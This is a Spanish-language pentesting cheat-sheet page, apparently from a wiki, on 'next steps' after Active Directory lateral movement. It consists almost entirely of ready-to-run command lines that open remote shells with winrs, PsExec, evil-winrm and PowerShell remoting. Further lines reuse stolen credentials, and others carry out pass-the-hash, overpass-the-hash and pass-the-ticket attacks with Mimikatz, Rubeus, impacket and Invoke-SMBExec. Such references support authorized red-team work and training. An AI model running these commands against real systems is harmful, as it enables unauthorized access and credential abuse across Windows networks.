6. Siguientes pasos

6.1. Tenemos acceso?

winrs

winrs -r:<HOSTNAME> cmd

PsExec

.\\PsExec.exe \\\\<HOSTNAME> cmd

PS-Script

1- $sess = New-PSSession -ComputerName <HOST>
2- Enter-PSSession -Session $sess

Script Block

1- $sess = New-PSSession -ComputerName <HOST>
2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}

WSManWinRM

Invoke-WSManWinRM -hostname <HOST> -command cmd

6.2. Tenemos credenciales?

winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
.\\PsExec.exe -u <Domain>/<USER> -p <PASS> \\\\<HOSTNAME> cmd
impacket-psexec <<Domain>/<USER>:<PASS>@<IP>>

#WSManWinRM
Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\\<USER> -password <PASS>

evil-winrm -i <IP> -u <Domain>/<USER>' -p <PASS>

#RDP Access
rdesktop -a 16 <IP> -u <DOMAIN\\USER> -p <PASS>
xfreerdp /v:IP /u:"<USER>" /p:<PASS>

6.3. Pass The Hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<> /ntlm:<NTLM> /run:powershell.exe"' 
impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
evil-winrm -u <username> -H <Hash> -i <IP>
pth-winexe -U <Domain>/<User>%<NT:LM> //<IP> cmd

#Impacket For Win
.\\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>

#Invoke-TheHash
Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Doamin> -Username <> -Hash <NTLM> -Command '<Inj SHELL>' -verbose

6.4. OverPass The Hash (OPTH) O Pass The Key (PTK)

Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
.\\PsExec.exe -accepteula \\\\<HOST> cmd
winrs -r:<HOST> cmd

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'

1- impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>"
2- export KRB5CCNAME=$(pwd)/<USER>.ccache
3- impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass

6.5. Pass The Ticket (PTT)

Invoke-Mimikatz -Command '"kerberos::ptt <C:\\Path\\To\\Ticket>"'
Rubeus.exe ptt /tikcet:<base64 Ticket>

#access
.\\PsExec.exe -accepteula \\\\<HOST> cmd
winrs -r:<HOST> cmd

Previous5. Movimiento lateral NextRecursos en Telegram

Last updated 11 months ago

Was this helpful?